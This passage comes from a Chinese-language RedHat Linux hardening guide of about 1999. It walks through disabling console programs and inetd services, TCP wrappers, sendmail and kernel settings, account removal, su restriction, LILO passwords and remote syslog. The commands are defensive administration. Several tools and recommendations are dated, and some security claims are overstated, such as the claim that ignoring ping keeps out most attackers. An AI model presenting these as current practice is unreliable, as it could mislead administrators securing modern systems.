注意:在服务器上装NFS服务是会有安全隐患的,就我个人而言,不建议你使用NFS。

9. 禁止使用控制台程序
一个最简单而且最常用的保证系统安全的方法就是禁止使用所有的控制台程序,如:shutdown和halt。可以运行下面的命令来实现:
[root@deep]# rm -f /etc/security/console.apps/servicename
这里servicename是你要禁止的控制台程序名。除非你使用xdm,否则不要把xserver文件删掉,如果这样除了root之外,没有人可以启动X服务器了。(如果使用xdm启动X服务器,这时root是唯一需要启动X服务器的用户,这才有必要把xserver文件删掉)。例如:
[root@deep]# rm -f /etc/security/console.apps/halt
[root@deep]# rm -f /etc/security/console.apps/poweroff
[root@deep]# rm -f /etc/security/console.apps/reboot
[root@deep]# rm -f /etc/security/console.apps/shutdown
[root@deep]# rm -f /etc/security/console.apps/xserver (如果删除,只有root可以启动X).
这些命令就可以禁止所有的控制台程序:halt、poweroff、reboot和shutdown。记住,只有装了Xwindow,删除xerver文件才会有效果。
注意:根据我们前一章的介绍安装服务器,Xwindow是没有安装上的,上面说的那些文件可能不会出现在“/etc/security”目录下的,如果这样就可以不管这一节介绍的方法。

10. 禁止控制台的访问
为了禁止所有的控制台访问,包括程序和文件,请在“/etc/pam.d/”目录下的所有文件中,给那些包含pam_console.so的行加上注释。这一步是上一章《禁止使用控制台程序》的延续。下面的脚本可以自动完成这项工作。转成root身份,创建disabling.sh脚本文件(touch disabling.sh),接着加入下面这些行:
# !/bin/sh
cd /etc/pam.d
for i in * ; do
sed '/[^#].*pam_console.so/s/^/#/' < $i > foo && mv foo $i
done
用下面的命令使脚本有可执行的权限,并执行它:
[root@deep]# chmod 700 disabling.sh
[root@deep]# ./disabling.sh
这样“/etc/pam.d”目录下所有文件中包含“pam_console.so”的行都被加上注释。这个脚本运行完之后,可以把它从系统中删掉。

11. “/etc/inetd.conf”文件
inetd,也叫作“超级服务器”,根据网络请求装入网络程序。“inetd.conf”文件告诉inetd监听哪些网络端口,为每个端口启动哪个服务。把Linux系统放在任何的网络环境中,第一件要做的事就是了解一下服务器到底要提供哪些服务。不需要的那些服务应该被禁止掉,最好卸载掉,这样黑客就少了一些攻击系统的机会。查看“/etc/inetd.conf”文件,了解一下inetd提供哪些服务。用加上注释的方法(在一行的开头加上#号),禁止任何不需要的服务,再给inetd进程发一个SIGHUP信号。
第一步:把文件的许可权限改成600。
[root@deep]# chmod 600 /etc/inetd.conf
第二步:确信文件的所有者是root。
[root@deep]# stat /etc/inetd.conf
这个命令显示出来的信息应该是:
File: "/etc/inetd.conf"
Size: 2869 Filetype: Regular File
Mode: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
Device: 8,6 Inode: 18219 Links: 1
Access: Wed Sep 22 16:24:16 1999(00000.00:10:44)
Modify: Mon Sep 20 10:22:44 1999(00002.06:12:16)
Change: Mon Sep 20 10:22:44 1999(00002.06:12:16)
第三步:编辑inetd.conf文件(vi /etc/inetd.conf),禁止所有不需要的服务,如:ftp、 telnet、 shell、 login、 exec、talk、ntalk、 imap、 pop-2、pop-3、finger、auth,等等。如果你觉得某些服务有用,可以不禁止这些服务。但是,把这些服务禁止掉,系统受攻击的可能性就会小很多。改变后的inetd.conf文件的内容如下面所示:
# To re-read this file after changes, just do a 'killall -HUP inetd'
#
#echo stream tcp nowait root internal
#echo dgram udp wait root internal
#discard stream tcp nowait root internal
#discard dgram udp wait root internal
#daytime stream tcp nowait root internal
#daytime dgram udp wait root internal
#chargen stream tcp nowait root internal
#chargen dgram udp wait root internal
#time stream tcp nowait root internal
#time dgram udp wait root internal
#
# These are standard services.
#
#ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
#
# Shell, login, exec, comsat and talk are BSD protocols.
#
#shell stream tcp nowait root /usr/sbin/tcpd in.rshd
#login stream tcp nowait root /usr/sbin/tcpd in.rlogind
#exec stream tcp nowait root /usr/sbin/tcpd in.rexecd
#comsat dgram udp wait root /usr/sbin/tcpd in.comsat
#talk dgram udp wait root /usr/sbin/tcpd in.talkd
#ntalk dgram udp wait root /usr/sbin/tcpd in.ntalkd
#dtalk stream tcp wait nobody /usr/sbin/tcpd in.dtalkd
#
# Pop and imap mail services et al
#
#pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d
#pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d
#imap stream tcp nowait root /usr/sbin/tcpd imapd
#
# The Internet UUCP service.
#
#uucp stream tcp nowait uucp /usr/sbin/tcpd /usr/lib/uucp/uucico -l
#
# Tftp service is provided primarily for booting. Most sites
# run this only on machines acting as "boot servers." Do not uncomment
# this unless you *need* it.
#
#tftp dgram udp wait root /usr/sbin/tcpd in.tftpd
#bootps dgram udp wait root /usr/sbin/tcpd bootpd
#
# Finger, systat and netstat give out user information which may be
# valuable to potential "system crackers." Many sites choose to disable
# some or all of these services to improve security.
#
#finger stream tcp nowait root /usr/sbin/tcpd in.fingerd
#cfinger stream tcp nowait root /usr/sbin/tcpd in.cfingerd
#systat stream tcp nowait guest /usr/sbin/tcpd /bin/ps -auwwx
#netstat stream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f inet
#
# Authentication
#
#auth stream tcp nowait nobody /usr/sbin/in.identd in.identd -l -e -o
#
# End of inetd.conf
注意:改变了inetd.conf文件之后,别忘了给inetd进程发一个SIGHUP信号(killall -HUP inetd)。
[root@deep /root]# killall -HUP inetd
第四步:
为了保证“inetd.conf”文件的安全,可以用chattr命令把它设成不可改变。把文件设成不可改变的只要用下面的命令:
[root@deep]# chattr +i /etc/inetd.conf
这样可以避免“inetd.conf”文件的任何改变(意外或是别的原因)。一个有“i”属性的文件是不能被改动的:不能删除或重命名,不能创建这个文件的连接,不能往这个文件里写数据。只有系统管理员才能设置和清除这个属性。如果要改变inetd.conf文件,你必须先清除这个不允许改变的标志:
[root@deep]# chattr -i /etc/inetd.conf

12. TCP_WRAPPERS
在默认情况下,RedHat Linux允许所有的服务请求。用TCP_WRAPPERS来保护服务器的安全,使其免受外部的攻击,比想象的要简单和轻松得多。在“/etc/hosts.deny”文件中加入“ALL: ALL@ALL, PARANOID”以禁止所有计算机访问你的服务器,然后在“/etc/hosts.allow”文件中一个一个加入允许访问你的服务器的计算机。这种作法是最安全的。
TCP_WRAPPERS是由两个文件控制的,依次是:/etc/hosts.allow和/etc/hosts.deny。判断是依次进行的,具体的规则如下:
* 如果在在/etc/hosts.allow文件中有匹配的项(daemon, client),那么允许访问;
* 否则,查看/etc/hosts.deny,如果找到匹配的项,那么访问被禁止;
* 否则,访问被允许。
第一步:编辑hosts.deny文件(vi /etc/hosts.deny)加入下面这些行:
Access is denied by default.
# Deny access to everyone.
ALL: ALL@ALL, PARANOID #Matches any host whose name does not match its address, see bellow.
这样做的意思是:所有的服务、访问位置,如果没有被明确地允许,也就是在/etc/hosts.allow中找不到匹配的项,就是被禁止的。
注意:加上“PARANOID”参数之后,如果要在服务器上使用telnet或ftp服务,就要在服务器的“/etc/hosts”文件中加入允许使用telnet和ftp服务的客户端计算机的名字和IP地址。否则,在显示登录提示之前,因为DNS的域名解析,可能要等上几分钟时间。
第二步:编辑hosts.allow文件(vi /etc/hosts.allow)。例如,可以加入下面这些行(被授权访问的计算机要被明确地列出来):
sshd: 208.164.186.1 gate.openarch.com
被授权访问的计算机的IP地址是:208.164.186.1,主机名是:gate.openarch.com,允许使用的服务是:sshd。
第三步:tcpdchk是检查TCP_WAPPERS配置的程序。它检查TCP_WAPPERS的配置,并报告它可以发现的问题或潜在的问题。在所有的配置都完成了之后,请运行tcpdchk程序:
[root@deep]# tcpdchk

13. “/etc/aliases”文件
aliases文件如果管理错误或管理得太粗心了就会造成安全隐患。例如:很多的软件产商都把“decode”这个别名放在aliases文件里。这样做的目的是为了方便通过email传送二进制文件。在发送邮件的时候,用户把二进制文件用“uuencode”转成ASCII文件,然后把结果发给接受端的“decode”。由这个别名让邮件信息通过“/usr/bin/uuencode”程序把二进制文件重新转换成ASCII文件。如果允许“decode”出现在aliases文件中,可以想象将会有什么样的安全隐患。
把定义“decode”这个别名的行从aliases文件中删除。同样的,每一个会运行程序的别名都要好好查看一下,很有可能要把它们删除掉。要使改动生效,还必须运行:
[root@deep]# /usr/bin/newaliases
编辑aliases文件(vi /etc/aliases),删除或注释掉下面这些行:
# Basic system aliases -- these MUST be present.
MAILER-DAEMON: postmaster
postmaster: root
# General redirections for pseudo accounts.
bin: root
daemon: root
#games: root ??remove or comment out.
#ingres: root ??remove or comment out.
nobody: root
#system: root ??remove or comment out.
#toor: root ??remove or comment out.

#uucp: root ??remove or comment out.
# Well-known aliases.
#manager: root ??remove or comment out.
#dumper: root ??remove or comment out.
#operator: root ??remove or comment out.
# trap decode to catch security attacks
#decode: root
# Person who should get root's mail
#root: marc
别忘了运行“/usr/bin/newaliases”使改变生效。

14. 防止sendmail被没有授权的用户滥用
最新版的sendmail(8.9.3)集成了很强大的防止垃圾邮件(anti-spam)的功能,可以防止邮件服务器被没有授权的用户滥用。要实现这个功能可以通过编辑“/etc/sendmail.cf”文件,改变配置文件以阻止那些发垃圾邮件的人。
编辑sendmail.cf文件(vi /etc/sendmail.cf),把这一行:
O PrivacyOptions=authwarnings
改为:
O PrivacyOptions=authwarnings,noexpn,novrfy
这些改变可以防止发垃圾邮件的人使用sendmail中的“EXPN”和“VRFY”命令。这些命令经常被没有授权的人使用。参考本书sendmail配置这一节以获得更多这方面的信息。
编辑sendmail.cf文件(vi /etc/sendmail.cf),把这一行:
O SmtpGreetingMessage=$j Sendmail $v/$Z; $b
改为:
O SmtpGreetingMessage=$j Sendmail $v/$Z; $b NO UCE C=xx L=xx
这将改变sendmail接受连接时所显示的提示信息。你要把“C=xx L=xx”中的“xx”改成你所在的国家和地区编码。例如:我是这样写的“C=CA L=QC”,代表加拿大,魁北克。这个改变不会对sendmail有什么影响,但是news.admin.net-abuse.email新闻组的人建议这么做,主要是为了预防法律上的问题。

15. 使系统对ping没有反应
防止你的系统对ping请求做出反应,对于网络安全很有好处,因为没人能够ping你的服务器并得到任何反应。TCP/IP协议本身有很多的弱点,黑客可以利用一些技术,把传输正常数据包的通道用来偷偷地传送数据。使你的系统对ping请求没有反应可以把这个危险减到最小。用下面的命令:
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
运行完这个命令后,系统对ping就没有反应了。可以把这一行加到“/etc/rc.d/rc.local”文件中去,这样当系统重新启动的时候,该命令就会自动运行。对ping命令没有反应,至少可以把绝大多数的黑客排除到系统之外,因为黑客不可能知道你的服务器在哪里。重新恢复对ping的响应,可以用下面的命令:
echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all"

16. 不要显示系统提示信息
如果你不想让远程登录的用户看到系统的提示信息,你可以改变“/etc/inetd.conf”文件中的telnet设置:
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd -h
在末尾加上“-h”参数可以让daemon不显示任何系统信息,只显示登录提示。当然,只有在服务器上装了telnet服务器才有这样做的必要。

17. “/etc/host.conf”文件
Linux用解析器(resolver)库把主机名翻译成IP地址。“/etc/host.conf”文件定义主机名是怎样解析的。“/etc/host.conf”文件中的那些项告诉解析器库用什么服务,以什么顺序解析主机名。
编辑host.conf文件(vi /etc/host.conf)加入下面这些行:
# Lookup names via DNS first then fall back to /etc/hosts.
order bind,hosts
# We have machines with multiple IP addresses.
multi on
# Check for IP address spoofing.
nospoof on
order选项指明的是选择服务的顺序。上面“order bind, hosts”说的是解析器库解析文件名的时候先查询域名服务器,然后再查看“/etc/hosts”文件。因为性能和安全上的原因,最好将解析器库的查找顺序设成先查域名服务器(bind)。当然也要先安装了DNS/BIND软件,否则这样配置根本没有任何作用。
multi选项决定在“/etc/hosts”文件中出现的主机能不能有多个IP地址(多个网络界面)。具有多个IP网络界面的主机被称为具有多个网络界面(multiomed),因为同时有多个IP地址也就意味着这台主机有多个网络界面。例如:网关服务器就有多个IP地址,必须把这个选项设成ON。
nospoof选项指明不允许IP伪装。IP伪装是把自己伪装成别的计算机去欺骗其它的计算机,获得它的信任。这种攻击方法把自己伪装成别的服务器,并且与其它客户机、服务器和大型数据存储系统建立网络连接或其它类型的网络活动。不管对任何类型的服务器,这个选项都要设成ON。

18. 路由协议
路由和路由协议会导致一些问题。IP原路径路由(IP source routing),也就是IP包包含到达底目的地址的详细路径信息,是非常危险的,因为根据RFC 1122规定目的主机必须按原路径返回这样的IP包。如果黑客能够伪造原路径路由的信息包,那么它就能截取返回的信息包,并且欺骗你的计算机,让它觉得正在和它交换信息的是可以信任的主机。我强烈建议你禁止IP原路径路由以避免这个安全漏洞。
用下面的命令在你的服务器上禁止IP原路径路由:
for f in /proc/sys/net/ipv4/conf/*/accept_source_route; do
echo 0 > $f
done
把上面的命令加到“/etc/rc.d/rc.local”文件中去,你就不用在系统重新启动之后再把这些命令敲一遍。注意,上面的命令将禁止所有的网络界面(lo、ethN、pppN,等等)的原路径路由包。如果你打算安装书中介绍的IPCHAINS防火墙,就不必用这些命令了,因为在防火墙的脚本文件中已经包含这些命令了。

19. 使TCP SYN Cookie保护生效
“SYN Attack”是一种拒绝服务(DoS)的攻击方式,会消耗掉系统中的所有资源,迫使服务器重新启动。拒绝服务(这种攻击方式用巨大的信息流来消耗系统的资源,以至于服务器不能够响应正常的连接请求)是很容易被黑客利用的。在2.1系列的内核中,syn cookie只是一个可选项,并没有使其生效。想要使其生效必须用下面的命令:
[root@deep]# echo 1 > /proc/sys/net/ipv4/tcp_syncookies
把这个命令加入“/etc/rc.d/rc.local”文件中,等下次系统重新启动的时候就不必重新敲一遍了。如果打算安装IPCHAINS防火墙,你就没有必要用这个命令,因为它已经包含在防火墙的脚本文件里了。

20. 防火墙
安全问题的另一个解决方案是把计算机主机和内部计算机间的信息传送同外部的网络隔离开,只让内部网络与外部网络之间的信息交流,通过一个安全的网关进行。这样一个网关叫做防火墙,在下面的一些章节我们会用很大的篇幅介绍防火墙。

21. “/etc/services”文件
端口号和标准服务之间的对应关系在RFC 1700 “Assigned Numbers"中有详细的定义。“/etc/services”文件使得服务器和客户端的程序能够把服务的名字转成端口号,这张表在每一台主机上都存在,其文件名是“/etc/services”。只有“root”用户才有权限修改这个文件,而且在通常情况下这个文件是没有必要修改的,因为这个文件中已经包含了常用的服务所对应的端口号。为了提高安全性,我们可以给这个文件加上保护以避免没有经过授权的删除和改变。为了保护这个文件可以用下面的命令:
[root@deep]# chattr +i /etc/services

22. “/etc/securetty”文件
“/etc/securetty”文件允许你规定“root”用户可以从那个TTY设备登录。登录程序(通常是“/bin/login”)需要读取“/etc/securetty”文件。它的格式是:列出来的tty设备都是允许登录的,注释掉或是在这个文件中不存在的都是不允许root登录的。
注释掉(在这一行的开头加上#号)所有你想不让root登录的tty设备。
编辑securetty文件(vi /etc/securetty)象下面一样,注释掉一些行:
tty1
#tty2
#tty3
#tty4
#tty5
#tty6
#tty7
#tty8
上面这样做的意思是只允许root在tty1上登录。我建议只允许root在一个tty设备上登录,如果从其它tty上登录,用“su”命令把身份转成“root”。

23. 特殊的帐号
禁止操作系统中不必要的预置帐号(每次升级或安装完都要检查一下)。Linux系统中就提供这样一些你可能不需要的预置帐号。如果确实不需要这些帐号,就把它们删掉。系统中有越多的帐号,就越容易受到攻击。
我们假定你已经在系统中使用shadow口令。如果不是这样,最好在系统中加上shadow口令的支持,因为这样系统会更安全。如果你是按照上一章介绍的方法安装服务器,那么在“安全验证配置”这一步就已经选上“Enable Shaow Passwords”这个选项了。
* 在系统中删除一个用户可以用这个命令:
[root@deep]# userdel username
* 在系统中删除一个组可以用这个命令:
[root@deep]# groupdel username
第一步
用下面的命令删除一些不必要的用户:
[root@deep]# userdel adm
[root@deep]# userdel lp
[root@deep]# userdel sync
[root@deep]# userdel shutdown
[root@deep]# userdel halt
[root@deep]# userdel news
[root@deep]# userdel uucp
[root@deep]# userdel operator
[root@deep]# userdel games (如果不用X Window服务器,可以删除这个用户)
[root@deep]# userdel gopher
[root@deep]# userdel ftp (如果没安装匿名ftp服务器,可以删除这个用户)
第二步
输入下面的命令删除一些不必要的组:
[root@deep]# groupdel adm
[root@deep]# groupdel lp
[root@deep]# groupdel news
[root@deep]# groupdel uucp
[root@deep]# groupdel games (delete this group if you don't use X Window Server).
[root@deep]# groupdel dip
[root@deep]# groupdel pppusers
[root@deep]# groupdel popusers (delete this group if you don't use pop server for email).
[root@deep]# groupdel slipusers
第三步
在系统中加入必要的用户:
* 在系统中添加用户,用这个命令:
[root@deep]# useradd username
* 给系统中的用户添加或改变口令,用这个命令:
[root@deep]# passwd username
例如:
[root@deep]# useradd admin
[root@deep]# passwd admin
这些命令的输出是这样的:
Changing password for user admin
New UNIX password: somepasswd
passwd: all authentication tokens updated successfully
第四步
“不许改变”位可以用来保护文件使其不被意外地删除或重写,也可以防止有些人创建这个文件的符号连接。删除“/etc/passwd”、“/etc/shadow”、“/etc/group”或“/etc/gshadow”都是黑客的攻击方法。
给口令文件和组文件设置不可改变位,可以用下面的命令:
[root@deep]# chattr +i /etc/passwd
[root@deep]# chattr +i /etc/shadow
[root@deep]# chattr +i /etc/group
[root@deep]# chattr +i /etc/gshadow
注意:如果将来要在口令或组文件中增加或删除用户,就必须先清除这些文件的不可改变位,否则就不能做任何改变。如果没有清除这些文件的不可改变位,安装那些会自动在口令文件和组文件中加入新用户的rpm软件包的时候,在安装过程中就会出现出错的提示。

24. 防止任何人都可以用su命令成为root
如果不想任何人都可以用“su”命令成为root或只让某些用户有权使用“su”命令,那么在“/etc/pam.d/su”文件中加入下面两行。我建议尽量限制用户通过“su”命令成为root。
第一步
编辑su文件(vi /etc/pam.d/su)在文件的头部加入下面两行:
auth sufficient /lib/security/pam_rootok.so debug
auth required /lib/security/pam_wheel.so group=wheel
加入这两行之后,“/etc/pam.d/su”文件变为:
#%PAM-1.0
auth sufficient /lib/security/pam_rootok.so debug
auth required /lib/security/pam_wheel.so group=wheel
auth required /lib/security/pam_pwdb.so shadow nullok
account required /lib/security/pam_pwdb.so
password required /lib/security/pam_cracklib.so
password required /lib/security/pam_pwdb.so shadow use_authtok nullok
session required /lib/security/pam_pwdb.so
session optional /lib/security/pam_xauth.so
这两行的意思是只有“wheel”组的成员才能用su命令成为root。注意,“wheel”组是系统中用于这个目的的特殊帐号。不能用别的组名。把这节介绍的方法和《22. “/etc/securetty”文件》中介绍的方法结合起来,可以更好地加强系统的安全性。
第二步
我们在“/etc/pam.d/su”配置文件中定义了“wheel”组,现在介绍一下怎样让一些用户可以用“su”命令成为“root”。下面是一个例子,让admin用户成为“wheel”组的成员,这样就可以用“su”命令成为“root”:
[root@deep]# usermod -G10 admin
“G”是表示用户所在的其它组。“10”是“wheel”组的ID值,“admin”是我们加到“wheel”组的用户。用同样的命令可以让其他的用户可以用su命令成为root。

25. 资源限制
限制用户对系统资源的使用,可以避免拒绝服务(如:创建很多进程、消耗系统的内存,等等)这种攻击方式。这些限制必须在用户登录之前设定。例如,可以用下面的方法对系统中用户加以。
第一步
编辑limits.conf文件(vi /etc/security/limits.conf),加入或改变下面这些行:
* hard core 0
* hard rss 5000
* hard nproc 20
这些行的的意思是:“core 0”表示禁止创建core文件;“nproc 20”把最多进程数限制到20;“rss 5000”表示除了root之外,其他用户都最多只能用5M内存。上面这些都只对登录到系统中的用户有效。通过上面这些限制,就能更好地控制系统中的用户对进程、core文件和内存的使用情况。星号“*”表示的是所有登录到系统中的用户。
第二步
必须编辑“/etc/pam.d/login”文件,在文件末尾加入下面这一行:
session required /lib/security/pam_limits.so
加入这一行后“/etc/pam.d/login”文件是这样的:
#%PAM-1.0
auth required /lib/security/pam_securetty.so
auth required /lib/security/pam_pwdb.so shadow nullok
auth required /lib/security/pam_nologin.so
account required /lib/security/pam_pwdb.so
password required /lib/security/pam_cracklib.so
password required /lib/security/pam_pwdb.so nullok use_authtok md5 shadow
session required /lib/security/pam_pwdb.so
session required /lib/security/pam_limits.so
#session optional /lib/security/pam_console.so

26. 更好地控制mount上的文件系统
可以用一些选项,如:noexec、nodev和nosuid,更好地控制mount上的文件系统,如:“/home”和“/tmp”。这些都在“/etc/fstab”文件中设定。fstab文件包含了各个文件系统的描述信息。如果想知道在这个文件中可以设定哪些选项,请用man命令查看关于mount的帮助。
编辑fstab文件(vi /etc/fstab),并根据需要把这两行:
/dev/sda11 /tmp ext2 defaults 1 2
/dev/sda6 /home ext2 defaults 1 2
改变成:
/dev/sda11 /tmp ext2 nosuid,nodev,noexec 1 2
/dev/sda6 /home ext2 nosuid,nodev 1 2
“nodev”表示不允许在这个文件系统上有字符或特殊的块设备。“nosuid”表示不允许设定文件的suid(set-user-identifier)和sgid(set-group-identifier)许可位。“noexec”表示不允许文件系统上有任何可执行的二进制文件。
注意:上面的例子中,“/dev/sda11”mount到“/tmp”目录上,而“/dev/sd6”mount到“/home”目录上。当然这和你的实际情况会有所不同,这些取决于你是怎么分区的以及用什么样的硬盘,例如:IDE硬盘是hda、hdb,等等,而SCSI硬盘是sda、sdb,等等。

27. 把rpm程序转移到一个安全的地方,并改变默认的访问许可
一旦在Linux服务器上用rpm命令安装完所有需要的软件,最好把rpm程序转移到一个安全的地方,如:软盘或其它你认为安全的地方。因为如果有人入侵了你的服务器,他就不能用rpm命令安装那些有害的软件。当然,如果将来要用rpm安装新的软件,你就要把rpm程序拷回原来的目录。
* 把rpm程序移到软盘上,用下面的命令:
[root@deep]# mount /dev/fd0 /mnt/floppy/
[root@deep]# mv /bin/rpm /mnt/floppy/
[root@deep]# umount /mnt/floppy
注意:千万不要把rpm程序从系统中卸载掉,否则以后就不能重新安装它,因为安装rpm程序或其它软件包本身就要用rpm命令。
还有一点要注意的是,把rpm命令的访问许可从默认的755改成700。这样非root用户就不能使用rpm命令了。特别是考虑到万一在安装完新软件之后忘了把rpm程序移到一个安全的地方,这样做就更有必要了。
* 改变“/bin/rpm”默认的访问权限,用下面这个命令:
[root@deep]# chmod 700 /bin/rpm

28. 登录shell
为了方便重复输入很长的命令,bash shell可以在“~/.bash_history”文件(“~/”是家目录,每个用户都是不一样的)中存500个曾经输入过的命令。每一个有自己帐号的用户,在自己的家目录中,都会有“.bash_history”文件。可能会有这种情况,用户在不该输入口令的地方输入了口令,而输入的口令会在“.bash_history”文件中保存下来。而且“.bash_history”文件越大这种可能性也越大。
在“/etc/profile”文件中HISTFILESIZE和HISTSIZE这两行决定了系统中所有用户的“.bash_history”文件可以保存多少命令。我建议把“/etc/profile”文件中的HISTFILESIZE和HISTSIZE都设成一个比较小的值,如:20。
编辑profile文件(vi /etc/profile),把这些行改成:
HISTFILESIZE=20
HISTSIZE=20
这样每个用户家目录下的“.bash_history”就最多只能存20个命令。如果黑客试图在用户的“~/.bash_history”文件中发现一些口令,他就没有什么机会了。

29. “/etc/lilo.conf”文件
LILO是Linux上一个多功能的引导程序。它可以用于多种文件系统,也可以从软盘或硬盘上引导Linux并装入内核,还可以做为其它操作系统的“引导管理器”。
根(/)文件系统对LILO来说很重要,有下面这两个原因:第一:LILO要告诉内核到那里去找根文件系统;第二:LILO要用到的一些东西,如:引导扇区、“/boot”目录和内核就存放在根文件系统中。引导扇区包括LILO引导程序的第一部分,这个部分在引导阶段的后半部分还要装入更大的引导程序。这两个引导程序通常存在“/boot/boot.b”文件中。内核是由引导程序装入并启动的。在RedHat Linux系统中,内核通常在根目录或“/boot”目录下。
因为LILO对Linux系统非常重要,所以我们要尽可能地保护好它。LILO最重要的配置文件是“/etc”目录下的“lilo.conf”文件。用这个文件我们可以配置或提高LILO程序以及Linux系统的安全性。下面是LILO程序的三个重要的选项设置。
* 加入:timeout=00
这项设置设定LILO在引导默认的系统之前,等候用户输入的时间。 C2安全等级规定这个时间间隔必须设成0,因为多重引导会使系统的安全措施形同虚设。除非想用多重引导,否则最好把这项设成0。
* 加入:restricted
当LILO引导的时候,输入参数linux single,进入单用户(single)模式。因为单用户模式没有口令验证,所以可以在LILO引导时,加上口令保护。“restricted”选项只能和“password”合起来用。注意要给每个内核都要加上口令保护。
* 加入:password=password
用单用户模式启动Linux系统的时候,系统要求用户输入这个口令。口令是大小写敏感的,而且要注意,要让“/etc/lilo.conf”文件,除了root之外,其他用户没有读的权限,这样也就看不到口令了。下面是用“lilo.conf”文件保护LILO的一个具体例子。
第一步
编辑lilo.conf文件(vi /etc/lilo.conf),加上或改变下面介绍的三个设置:
boot=/dev/sda
map=/boot/map
install=/boot/boot.b
prompt
timeout=00 ??change this line to 00.
Default=linux
restricted ??add this line.
password=password ??add this line and put your password.
image=/boot/vmlinuz-2.2.12-20
label=linux
initrd=/boot/initrd-2.2.12-10.img
root=/dev/sda6
read-only
第二步
因为“/etc/lilo.conf”配置文件里,存在没有经过加密的口令,所以只有root才能有读的权限。用下面的命令改变文件的权限:
[root@deep]# chmod 600 /etc/lilo.conf (will be no longer world readable).
第三步
使改变后的“/etc/lilo.conf”配置文件生效:
[root@deep]# /sbin/lilo -v (to update the lilo.conf file).
第四步
为了更安全一点,可以用chattr命令给“lilo.conf”文件加上不可改变的权限。
* 让文件不可改变用下面的命令:
[root@deep]# chattr +i /etc/lilo.conf
这样可以避免“lilo.conf”文件因为意外或其它原因而被改变。如果想要改变“lilo.conf”文件,必须先清除它的不可改变标志。
* 清除不可改变的标记用下面的命令:
[root@deep]# chattr -i /etc/lilo.conf

30. 使Control-Alt-Delete关机键无效
把“/etc/inittab”文件中的一行注释掉可以禁止用Control-Alt-Delete关闭计算机。如果服务器不是放在一个安全的地方,这非常重要。
编辑inittab文件(vi /etc/inittab)把这一行:
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
改为:
#ca::ctrlaltdel:/sbin/shutdown -t3 -r now
用下面的命令使改变生效:
[root@deep]# /sbin/init q

31. 创建所有重要的日志文件的硬拷贝
保证在“/var/log”目录下的不同日志文件的完整性是保证系统安全所要考虑的非常重要的一个方面。如果我们在服务器上已经加上了很多安全措施,黑客还是能够成功入侵,那么日志文件就是我们最后的防范措施。因此,很有必要考虑一下用什么方法才能保证日志文件的完整性。如果服务器上或网络中的其它服务器上已经安装了打印机,就可以把重要的日志文件打印出来。这要求有一个可以连续打印的打印机,并用syslog把所有重要的日志文件传到“/dev/lp0”(打印设备)。黑客可以改变服务器上的文件、程序,等等,但是,把重要的日志文件打印出来之后,他就无能为力了。
例如:
记录下服务器上所有的telnet、mail、引导信息和ssh连接,并打印到连接在这台服务器上的打印机。需要在“/etc/syslog.conf”文件中加入一行。
编辑syslog.conf文件(vi /etc/syslog.conf),在文件末尾加入下面这一行:
authpriv.*;mail.*;local7.*;auth.*;daemon.info /dev/lp0
重新启动syslog daemon使改动生效:
[root@deep]# /etc/rc.d/init.d/syslog restart
又例如:
记录下服务器上所有的telnet、mail、引导信息和ssh连接,并打印到本地网络中其它服务器上连接的打印机,要在这台接收日志文件的服务器的“/etc/syslog.cof”文件中加入一行。如果本地网中没有打印机,可以把所有的日志文件拷贝到别的服务器上,只要忽略下面第一步,把“/dev/lp0”加到其它服务器的“syslog.conf”文件中,直接跳到在其它服务器上设置“-r”参数那一步。把所有日志文件拷贝到其它计算机上,使你可以在一台计算机上管理多台计算机的日志文件,从而简化管理工作。
编辑接收日志文件的服务器(例如:mail.openarch.com)上的syslog.conf文件(vi /etc/syslog.conf),在文件的末尾加入下面这一行:
authpriv.*;mail.*;local7.*;auth.*;daemon.info /dev/lp0
因为syslog daemon的默认配置是拒绝接收来自网络上的信息,我们必须使它能够接收来自网络上的信息,在syslog daemon的脚本文件(指的是接收日志文件的服务器上的脚本文件)中加入下面的“-r”参数。
编辑syslog脚本文件(vi +24 /etc/rc.d/init.d/syslog),把这一行:
daemon syslogd -m 0
改为:
daemon syslogd -r -m 0
重新启动syslog daemon使改动生效:
[root@mail]# /etc/rc.d/init.d/syslog restart
如果接收日志文件的服务器上有防火墙,你可以检查一下防火墙的脚本文件中有没有下面几行(没有就加上):
ipchains -A input -i $EXTERNAL_INTERFACE -p udp
-s $SYSLOG_CLIENT
-d $IPADDR 514 -j ACCEPT
在这个例子中防火墙的脚本文件中定义了EXTERNAL_INTERFACE="eth0";
IPADDR="208.164.186.2";
SYSLOG_CLIENT="208.164.168.0/24"
重新启动接收日志文件的服务器上的防火墙,使改动生效:
[root@mail]# /etc/rc.d/init.d/firewall restart
这个防火墙规则允许接收日志文件的服务器接收来自端口514(syslog的端口)的UDP包。关于防火墙的资料可以查看《第七章 网络防火墙》。
最后,编辑一下发送日志文件的服务器上的“syslog.conf”文件(vi /etc/syslog.conf),在末尾加上这一行:
authpriv.*;mail.*;local7.*;auth.*;daemon.info @mail
“mail”是接收日志文件的计算机主机名。如果有人试图黑你的计算机并且威胁把所有重要的系统日志文件都删掉,你就不用怕了,因为你已经打印出来或者在别的地方还有一个拷贝。这样就可以根据这些日志文件分析出黑客在什么地方,然后出理这次入侵事件。
重新启动syslog daemon,使改变生效:
[root@deep]# /etc/rc.d/init.d/syslog restart
同样也要看看发送日志文件的服务器的防火墙的脚本文件中有没有这几行(没有加上);
ipchains -A output -i $EXTERNAL_INTERFACE -p udp
-s $IPADDR 514
-d $SYSLOG_SERVER 514 -j ACCEPT
这里防火墙的脚本文件中定义了:
EXTERNAL_INTERFACE="eth0"
IPADDR="208.164.186.1"
SYSLOG_SERVER="mail.openarch.com"
重新启动防火墙,使改变生效:
[root@deep]# /etc/rc.d/init.d/firewall restart
这个防火墙的规则允许发送日志文件的服务器通过端口514(syslog端口)发送UDP包。关于防火墙的资料可以查看《第七章 网络防火墙》。
注意:千万不要用网关服务器来收集和管理所有的系统日志信息。有关syslogd程序的其它一些参数和策略,可以用man命令查看帮助:syslogd(8)、syslog(2)和syslog.conf(5)。

32. 改变“/etc/rc.d/init.d/”目录下的脚本文件的访问许可
改变启动和停止daemon的脚本文件的权限。
